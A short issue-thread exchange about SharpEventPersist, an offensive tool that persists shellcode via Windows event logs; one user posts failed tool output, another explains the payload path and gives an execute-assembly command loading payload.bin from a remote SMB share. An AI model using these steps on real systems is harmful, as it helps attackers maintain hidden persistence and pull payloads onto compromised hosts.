hello，

[ZHOUXINGXING9]

Using shellcode: C:\Users\Administrator\Desktop\payload.bin Setting event log instance id: 1337 Setting event log source to: Cobaltstrick Setting event log to: Key Management Service [-] Invoke_3 on EntryPoint failed. why？

[roobixx]

Is the payload binary on the target at C:\Users\Adminsitrator\Desktop\payload.bin? If not, it will fail because SharpEventPersist looks at the file path on the target it is running.

If you want to host your payload remotely, you could do something like this:

execute-assembly /home/rbx/payload.bin -file \\<IP>\Share\payload.bin

Where the IP is a SMB sever with your payload. I used Impactet's SMBserver for my testing and it worked well..